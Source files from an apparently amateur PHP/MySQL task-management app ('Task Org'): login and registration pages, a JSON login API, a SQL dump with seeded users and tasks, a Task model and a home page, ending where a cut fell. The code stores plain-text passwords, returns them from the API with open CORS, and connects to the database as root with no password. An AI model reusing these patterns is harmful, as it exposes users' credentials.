<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body><file_sep><?php
// JSON login endpoint: accepts {"username": ..., "password": ...} in the
// raw request body and echoes the matching user record, or an error object.
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
include_once '../../config/Database.php';
include_once '../../models/User.php';
// Wire up a database connection and the User model (both defined in the
// included files — not visible here).
$database = new Database();
$db = $database->connect();
$user = new User($db);
// Credentials arrive as a raw JSON body, not as form fields.
$data = json_decode(file_get_contents("php://input"));
$user->username= $data->username;
$user->password= $data->password;
// login() appears to return a PDOStatement of matching rows — TODO confirm
// against models/User.php.
$result = $user->login();
$num = $result->rowCount();
if($num==1){
// Exactly one match: emit {"data": [user]}.
$userArr = array();
$userArr['data']=array();
while ($row=$result->fetch(PDO::FETCH_ASSOC)){
$userItem= array(
'UserId'=>$row['UserId'],
'Username'=>$row['Username'],
// NOTE(review): the stored password is echoed back to the client —
// confirm this is intended; normally it should never leave the server.
'Password'=>$row['<PASSWORD>'],
'Type'=>$row['Type']
);
array_push($userArr['data'], $userItem);
}
echo json_encode($userArr);
}else{
echo json_encode(array('message'=>'No users found'));
}
}<file_sep><?php
session_start();
include('../config/connection.php');

// Already authenticated users have no business on the register page.
if (isset($_SESSION["UserId"])) {
    header('Location:home.php');
    exit; // header() alone does not stop script execution
}

$usernameErr = $username = $password = $passwordErr = "";
$check = true;

if (isset($_POST['submit'])) {
    // --- server-side validation --------------------------------------
    if (!empty($_POST['username'])) {
        if (strlen($_POST['username']) <= 20) {
            $username = $_POST['username'];
        } else {
            $usernameErr = "Username is too long";
            $check = false;
        }
    } else {
        $usernameErr = "Username is empty";
        $check = false;
    }
    if (!empty($_POST['password'])) {
        if (strlen($_POST['password']) <= 20) {
            $password = $_POST['password'];
        } else {
            $passwordErr = "Password is too long";
            $check = false;
        }
    } else {
        $passwordErr = "Password is empty";
        $check = false;
    }

    if ($check) {
        // Case-insensitive uniqueness check done in SQL instead of
        // fetching every user row and comparing in PHP.
        $stmt = $con->prepare('SELECT id FROM users WHERE LOWER(username) = LOWER(?)');
        $stmt->bind_param('s', $username);
        $stmt->execute();
        $stmt->store_result();
        if ($stmt->num_rows > 0) {
            $usernameErr = "User with that name already exists.";
        } else {
            // Prepared statements fix the SQL injection in the original
            // string-concatenated INSERT/SELECT. Type 2 = "worker".
            // NOTE(review): passwords are stored in plain text app-wide —
            // they should be hashed with password_hash().
            $stmt = $con->prepare('INSERT INTO users(username, password, type) VALUES (?, ?, 2)');
            $stmt->bind_param('ss', $username, $password);
            $stmt->execute();

            // Fetch the new row (id + resolved type name) for the session.
            $stmt = $con->prepare('SELECT u.id AS UserId, t.name AS Type FROM users u, usertype t WHERE t.id = u.type AND u.username = ?');
            $stmt->bind_param('s', $username);
            $stmt->execute();
            $row2 = $stmt->get_result()->fetch_assoc();

            $_SESSION["Username"] = $username;
            $_SESSION["Type"] = $row2['Type'];
            $_SESSION["UserId"] = $row2['UserId'];
            header('Location:home.php');
            exit;
        }
    }
}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<title>Task Org</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
<link href="css/login.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
</head>
<body>
<div class="wrapper fadeInDown">
<div id="formContent">
<!-- Icon -->
<div class="fadeIn first">
<img src="img/login-icon.png" id="icon" alt="User Icon" />
</div>
<!-- Login Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>">
<input type="text" id="username" class="fadeIn second" name="username" placeholder="username">
<br>
<span style="color: red;"><?php echo $usernameErr?></span>
<input type="password" id="password" class="fadeIn third" name="password" placeholder="<PASSWORD>">
<br>
<span style="color: red;"><?php echo $passwordErr?></span>
<br>
<input type="submit" name="submit" disabled class="fadeIn fourth" value="Register" id="login">
</form>
<!-- Remind Passowrd -->
<div id="formFooter">
<a class="underlineHover" href="login.php">Already registered? Login in!</a>
</div>
</div>
</div>
</body>
</html>
<script>
// Enable the Register button only once the username is at least four
// characters long.
// NOTE(review): the password field is not checked client-side — the PHP
// validation at the top of this file is the only guard; confirm intended.
$(document).ready(function(){
$('#username').on('input',function(e){
var user = $('#username').val();
if(user.length >= 4){
$( "#login" ).prop( "disabled", false );
}else{
$( "#login" ).prop( "disabled", true );
}
});
});
</script>
<file_sep>-- phpMyAdmin SQL Dump
-- version 4.9.2
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Jul 21, 2020 at 12:38 AM
-- Server version: 10.4.10-MariaDB
-- PHP Version: 7.3.12
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `tasksys`
--
-- --------------------------------------------------------
--
-- Table structure for table `statustype`
--
CREATE TABLE `statustype` (
`id` smallint(6) NOT NULL,
`name` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `statustype`
--
INSERT INTO `statustype` (`id`, `name`) VALUES
(1, 'Completed'),
(2, 'In Progress'),
(3, 'Canceled');
-- --------------------------------------------------------
--
-- Table structure for table `tasks`
--
CREATE TABLE `tasks` (
`id` int(11) NOT NULL,
`name` varchar(32) NOT NULL,
`text` varchar(300) NOT NULL,
`time` date NOT NULL,
`userId` int(11) NOT NULL,
`lng` varchar(300) NOT NULL,
`lat` varchar(300) NOT NULL,
`status` smallint(6) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `tasks`
--
INSERT INTO `tasks` (`id`, `name`, `text`, `time`, `userId`, `lng`, `lat`, `status`) VALUES
(2, 'Ociscivanje', 'Da bude sve cistije mister proper', '2020-01-25', 4, '42.441447', '19.263273', 1),
(5, 'Dostavka', 'Dostaviti potrebne materijale u bemax', '2019-12-28', 3, '43.155024', '18.844474', 2),
(7, 'Very Yes', 'Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. <NAME>, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more ', '2020-01-15', 3, '42.824970', '19.514490', 1),
(8, 'Sortiranje', 'Sortiranje nove breskve u 3 klase.', '2020-01-09', 3, '43.069519', '19.754910', 3),
(9, 'Autoput', 'Asfaltiranje novog autoputa ', '2019-12-30', 3, '43.139689', '19.599371', 2),
(10, 'Namos', 'Ugradnja klimatizacije u namos salonu namjestaja.', '2020-01-16', 3, '42.55658', '19.08472', 2),
(11, 'Ugradnja Prozora', 'Na onaj baron preko puta faksa da se nakace novi prozori', '2019-12-30', 4, '42.207141', '18.945988', 1),
(12, 'Kopanje kanala', 'Jedan dobar kanal da se ova voda makne sa puta.', '2019-12-28', 21, '42.428303', '19.270615', 2),
(13, 'Poravnanje', 'Poravnati ove trotoare po centru da nam se narod ne spotice', '2020-01-14', 26, '42.444451', '19.253637', 3),
(14, 'Planina', 'It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. <NAME>, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more', '2020-01-29', 4, '42.448466', '19.273188', 3),
(15, 'Krevet', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.', '2020-01-29', 4, '42.447341', '19.259807', 1),
(17, 'Stolica', 'Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"', '2020-02-05', 26, '42.424724', '19.241509', 1),
(19, 'Jakna', 'Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia', '2020-01-15', 21, '42.436787', '19.235449', 2),
(20, 'Prepelica', 'Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur', '2019-12-29', 21, '42.428303', '19.270615', 2),
(21, '<NAME>', 'Odnijeti 12 Euro paleta na objekat 4', '2020-03-03', 3, '42.432009', '19.267050', 2),
(23, '<NAME>', 'We work all over, had bout 5 jobs last month.', '2020-03-03', 26, '42.432009', '19.267050', 2),
(24, '<NAME>', 'Potrebno je izmijesati 520kg breskve za proizvodnju dzema', '2020-05-13', 3, '42.428303', '19.270615', 2);
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id` int(11) NOT NULL,
`username` varchar(32) NOT NULL,
`password` varchar(32) NOT NULL,
`type` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id`, `username`, `password`, `type`) VALUES
(2, 'marko', 'marko', 2),
(3, 'ivan', '<PASSWORD>', 2),
(4, 'vladimir', 'vladimir', 2),
(5, 'miroslav', 'miroslav', 4),
(21, 'mirko', 'mirko', 3),
(22, 'nemanja', '<PASSWORD>', 1),
(25, 'misha', 'misha', 4),
(26, 'jovan', 'jovan', 2),
(27, 'jocko', 'jocko', 2);
-- --------------------------------------------------------
--
-- Table structure for table `usertype`
--
CREATE TABLE `usertype` (
`id` int(11) NOT NULL,
`name` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `usertype`
--
INSERT INTO `usertype` (`id`, `name`) VALUES
(1, 'boss'),
(2, 'worker'),
(3, 'manager'),
(4, 'banned');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `statustype`
--
ALTER TABLE `statustype`
ADD PRIMARY KEY (`id`) USING BTREE;
--
-- Indexes for table `tasks`
--
ALTER TABLE `tasks`
ADD PRIMARY KEY (`id`),
ADD KEY `status` (`status`),
ADD KEY `userId` (`userId`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id`),
ADD KEY `type` (`type`);
--
-- Indexes for table `usertype`
--
ALTER TABLE `usertype`
ADD PRIMARY KEY (`id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `statustype`
--
ALTER TABLE `statustype`
MODIFY `id` smallint(6) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `tasks`
--
ALTER TABLE `tasks`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=25;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=28;
--
-- AUTO_INCREMENT for table `usertype`
--
ALTER TABLE `usertype`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `tasks`
--
ALTER TABLE `tasks`
ADD CONSTRAINT `tasks_ibfk_1` FOREIGN KEY (`userId`) REFERENCES `users` (`id`) ON UPDATE NO ACTION,
ADD CONSTRAINT `tasks_ibfk_2` FOREIGN KEY (`status`) REFERENCES `statustype` (`id`) ON UPDATE NO ACTION;
--
-- Constraints for table `users`
--
ALTER TABLE `users`
ADD CONSTRAINT `users_ibfk_1` FOREIGN KEY (`type`) REFERENCES `usertype` (`id`) ON UPDATE NO ACTION;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep><?php
session_start();
include('../config/connection.php');

// Logged-in users go straight to the app.
if (isset($_SESSION["UserId"])) {
    header('Location:home.php');
    exit; // header() alone does not stop script execution
}

$username = $password = $msg = "";
$check = true;

if (isset($_POST['submit'])) {
    if (!empty($_POST['username'])) {
        $username = $_POST['username'];
    } else {
        $check = false;
    }
    if (!empty($_POST['password'])) {
        $password = $_POST['password'];
    } else {
        $check = false;
    }

    if ($check) {
        // Look up the single matching user instead of fetching every
        // account and comparing in PHP. BINARY keeps the comparison
        // case-sensitive, matching the original PHP == checks.
        // NOTE(review): passwords are compared in plain text app-wide —
        // they should be hashed and checked with password_verify().
        $stmt = $con->prepare('SELECT u.id AS UserId, t.name AS Type FROM users u, usertype t WHERE t.id = u.type AND BINARY u.username = ? AND BINARY u.password = ?');
        $stmt->bind_param('ss', $username, $password);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_assoc();
        if ($row) {
            if ($row['Type'] == "banned") {
                $msg = "You are banned";
            } else {
                $_SESSION["Username"] = $username;
                $_SESSION["Type"] = $row['Type'];
                $_SESSION["UserId"] = $row['UserId'];
                header('Location:home.php');
                exit;
            }
        }
    }
}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<title>Task Org</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
<link href="css/login.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
</head>
<body>
<div class="wrapper fadeInDown">
<div id="formContent">
<!-- Icon -->
<div class="fadeIn first">
<img src="img/login-icon.png" id="icon" alt="User Icon" />
</div>
<!-- Login Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>">
<input type="text" id="username" class="fadeIn second" value="<?php echo $username?>" name="username" placeholder="username">
<input type="<PASSWORD>" id="password" class="fadeIn third" name="password" placeholder="<PASSWORD>">
<br><span style="color:red"><?php echo $msg?></span><br>
<input type="submit" name="submit" disabled class="fadeIn fourth" value="Log In" id="login">
<div id="error"></div>
</form>
<!-- Remind Passowrd -->
<div id="formFooter">
<a class="underlineHover" href="register.php">Register?</a>
</div>
</div>
</div>
</body>
</html>
<script>
// Enable the Log In button only once the username is at least four
// characters long.
// NOTE(review): the password field is not checked client-side — the PHP
// validation at the top of this file is the only guard; confirm intended.
$(document).ready(function(){
$('#username').on('input',function(e){
var user = $('#username').val();
if(user.length >= 4){
$( "#login" ).prop( "disabled", false );
}else{
$( "#login" ).prop( "disabled", true );
}
});
});
</script>
<file_sep><?php
class Task{
private $conn;
private $table = 'tasks';
public $id;
public $name;
public $text;
public $time;
public $userId;
public $lng;
public $lat;
public $status;
public function __construct($db)
{
$this->conn=$db;
}
public function read(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id ORDER BY t.time ASC';
$stmt=$this->conn->prepare($query);
$stmt->execute();
return $stmt;
}
public function readById(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,
t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,
t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id AND t.id = ?';
$stmt=$this->conn->prepare($query);
$stmt->bindParam(1, $this->id);
$stmt->execute();
return $stmt;
}
public function readByUser(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,
t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,
t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id AND t.userId = ? ORDER BY t.time ASC';
$stmt=$this->conn->prepare($query);
$stmt->bindParam(1, $this->id);
$stmt->execute();
$row = $stmt->fetch(PDO::FETCH_ASSOC);
$this->id=$row['TaskId'];
$this->name=$row['Name'];
$this->text=$row['Description'];
$this->time=$row['Time'];
$this->userId=$row['WorkerId'];
$this->lng=$row['Longitude'];
$this->lat=$row['Latitude'];
$this->status=$row['Status'];
return $stmt;
}
public function readByStatus(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,
t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,
t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id AND t.status = ? ORDER BY t.time ASC';
$stmt=$this->conn->prepare($query);
$stmt->bindParam(1, $this->id);
$stmt->execute();
$row = $stmt->fetch(PDO::FETCH_ASSOC);
$this->id=$row['TaskId'];
$this->name=$row['Name'];
$this->text=$row['Description'];
$this->time=$row['Time'];
$this->userId=$row['WorkerId'];
$this->lng=$row['Longitude'];
$this->lat=$row['Latitude'];
$this->status=$row['Status'];
return $stmt;
}
public function create() {
$query = 'INSERT INTO ' . $this->table .
' SET name = :name,
text = :text,
time = :time,
userId = :userId,
lng = :lng,
lat = :lat,
status = :status';
$stmt = $this->conn->prepare($query);
$this->name = htmlspecialchars(strip_tags($this->name));
$this->text = htmlspecialchars(strip_tags($this->text));
$this->time = htmlspecialchars(strip_tags($this->time));
$this->userId = htmlspecialchars(strip_tags($this->userId));
$this->lng = htmlspecialchars(strip_tags($this->lng));
$this->lat = htmlspecialchars(strip_tags($this->lat));
$this->status = htmlspecialchars(strip_tags($this->status));
$stmt->bindParam(':name', $this->name);
$stmt->bindParam(':text', $this->text);
$stmt->bindParam(':time', $this->time);
$stmt->bindParam(':userId', $this->userId);
$stmt->bindParam(':lng', $this->lng);
$stmt->bindParam(':lat', $this->lat);
$stmt->bindParam(':status', $this->status);
// Execute query
if($stmt->execute()) {
return true;
}
// Print error if something goes wrong
printf("Error: %s.\n", $stmt->error);
return false;
}
public function update() {
    // Update every mutable field of the task row identified by $this->id.
    // Returns true on success; prints the driver error and returns false otherwise.
    $query = 'UPDATE ' . $this->table .
        ' SET name = :name,
        text = :text,
        time = :time,
        userId = :userId,
        lng = :lng,
        lat = :lat,
        status = :status WHERE id = :id';
    $stmt = $this->conn->prepare($query);
    // Strip tags / encode entities so stored values are safe to echo as HTML.
    $this->name = htmlspecialchars(strip_tags($this->name));
    $this->text = htmlspecialchars(strip_tags($this->text));
    $this->time = htmlspecialchars(strip_tags($this->time));
    $this->userId = htmlspecialchars(strip_tags($this->userId));
    $this->lng = htmlspecialchars(strip_tags($this->lng));
    $this->lat = htmlspecialchars(strip_tags($this->lat));
    $this->status = htmlspecialchars(strip_tags($this->status));
    $this->id = htmlspecialchars(strip_tags($this->id));
    $stmt->bindParam(':name', $this->name);
    $stmt->bindParam(':text', $this->text);
    $stmt->bindParam(':time', $this->time);
    $stmt->bindParam(':userId', $this->userId);
    $stmt->bindParam(':lng', $this->lng);
    $stmt->bindParam(':lat', $this->lat);
    $stmt->bindParam(':status', $this->status);
    $stmt->bindParam(':id', $this->id);
    // Execute query
    if($stmt->execute()) {
        return true;
    }
    // BUG FIX: PDOStatement has no $stmt->error property (that is the mysqli
    // API); errorInfo()[2] holds the driver-specific error message.
    printf("Error: %s.\n", $stmt->errorInfo()[2]);
    return false;
}
public function delete() {
    // Delete the task row identified by $this->id.
    // Returns true on success; prints the driver error and returns false otherwise.
    $query = 'DELETE FROM ' . $this->table . ' WHERE id = :id';
    $stmt = $this->conn->prepare($query);
    // Sanitize the id the same way the other write methods do.
    $this->id = htmlspecialchars(strip_tags($this->id));
    $stmt->bindParam(':id', $this->id);
    if($stmt->execute()) {
        return true;
    }
    // BUG FIX: PDOStatement has no $stmt->error property (that is the mysqli
    // API); errorInfo()[2] holds the driver-specific error message.
    printf("Error: %s.\n", $stmt->errorInfo()[2]);
    return false;
}
}<file_sep><?php
// Database connection settings for the legacy mysqli-based pages.
$server = 'localhost';
$user = 'root';
$pass = '';
$baza = '<PASSWORD>';
// Open the connection; $con is used directly by every including script.
$con = new mysqli($server,$user,$pass,$baza);
if(!$con->connect_error){
// Signal success back to the include() caller.
return true;
}else{
// Stop the whole request when the database is unreachable.
die("Connection error" . $con->connect_error);
}<file_sep><?php
session_start();
// Require an authenticated session; redirect anonymous visitors to the
// landing page. BUG FIX: header() alone does not stop execution — without
// exit the rest of this page was still rendered and sent to the visitor.
if (!isset($_SESSION["UserId"])) {
    header('Location:index.php');
    exit;
}
//if(isset ($_SESSION["Type"])=="banned"){
// echo '<script type="text/javascript">';
// echo ' alert("You have been banned")'; //not showing an alert box.
// echo '</script>';
// header('Location:home.php');
//}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
<link href="css/home.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;: ">
<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
if($_SESSION["Type"]=="boss") {
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<!--Table-->
<table class="table table-striped w-min" style="width: auto; margin: auto">
<!--Table head-->
<thead id="theader">
</thead>
<!--Table head-->
<!--Table body-->
<tbody id="tbodyy">
</tbody>
<!--Table body-->
</table>
<!--Table-->
<!-- Button trigger modal -->
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<script>
$(document).ready(function(){
if("<?php echo $_SESSION["Type"]?>"=="boss" || "<?php echo $_SESSION["Type"]?>"=="manager"){
$.ajax({
url:"../api/task/read.php",
dataType:"JSON",
success:function(data)
{
$('#theader').append($('<tr>')
.append($('<th>').append("#"))
.append($('<th>').append("Name"))
.append($('<th>').append("Description"))
.append($('<th>').append("Worker"))
.append($('<th>').append("Status"))
.append($('<th>').append("Time"))
.append($('<th>').append($('<select onselect="hoho(this);"class="form-control" id="statusSelect">').append('<option value="all">all</option><option value="1">Completed</option><option value="2">In progress</option><option value="3">Canceled</option>')))
);
$( "#statusSelect" ).change(function() {
var selected = $("#statusSelect").val();
if(selected=="all"){
$('#tbodyy').empty();
$.ajax({
url:"../api/task/read.php",
data:{id:selected},
dataType:"JSON",
success:function(data)
{
$('#tbodyy').empty();
var i;
for (i = 0; i < data.length; i++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[i].TaskId))
.append($('<td>').append(data[i].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[i].Description))
.append($('<td>').append(data[i].Worker))
.append($('<td>').append(data[i].Status))
.append($('<td>').append(data[i].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[i].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}else{
$.ajax({
url:"../api/task/readByStatus.php",
data:{id:selected},
dataType:"JSON",
success:function(data)
{
$('#tbodyy').empty();
var i;
for (i = 0; i < data.length; i++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[i].TaskId))
.append($('<td>').append(data[i].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[i].Description))
.append($('<td>').append(data[i].Worker))
.append($('<td>').append(data[i].Status))
.append($('<td>').append(data[i].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[i].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}
});
var i;
for (i = 0; i < data.length; i++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[i].TaskId))
.append($('<td>').append(data[i].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[i].Description))
.append($('<td>').append(data[i].Worker))
.append($('<td>').append(data[i].Status))
.append($('<td>').append(data[i].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[i].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}else{
$.ajax({
url:"../api/task/readByUser.php",
data:{id:"<?php echo $_SESSION["UserId"]?>"},
dataType:"JSON",
success:function(data)
{
$('#theader').append($('<tr>')
.append($('<th>').append("#"))
.append($('<th>').append("Name"))
.append($('<th>').append("Description"))
.append($('<th>').append("Status"))
.append($('<th>').append("Time"))
.append($('<th>').append($('<select class="form-control" id="statusSelect">').append('<option value="all">all</option><option value="1">Completed</option><option value="2">In progress</option><option value="3">Canceled</option>')))
);
var j;
for (j = 0; j < data.length; j++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[j].TaskId))
.append($('<td>').append(data[j].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[j].Description))
.append($('<td>').append(data[j].Status))
.append($('<td>').append(data[j].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[j].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
$( "#statusSelect" ).change(function() {
var selected = $("#statusSelect").val();
if(selected=="all"){
$('#tbodyy').empty();
$.ajax({
url:"../api/task/readByUser.php",
data:{id:"<?php echo $_SESSION["UserId"]?>"},
dataType:"JSON",
success:function(data)
{
var j;
for (j = 0; j < data.length; j++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[j].TaskId))
.append($('<td>').append(data[j].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[j].Description))
.append($('<td>').append(data[j].Status))
.append($('<td>').append(data[j].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[j].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}else{
$.ajax({
url:"../api/task/readByStatus.php",
data:{id:selected},
dataType:"JSON",
success:function(data)
{
$('#tbodyy').empty();
var j;
for (j = 0; j < data.length; j++) {
if(data[j].WorkerId=="<?php echo $_SESSION["UserId"]?>"){
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[j].TaskId))
.append($('<td>').append(data[j].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[j].Description))
.append($('<td>').append(data[j].Status))
.append($('<td>').append(data[j].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[j].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
}
},error:function (request) {
console.log(request.responseText);
}
})
}
});
},error:function (request) {
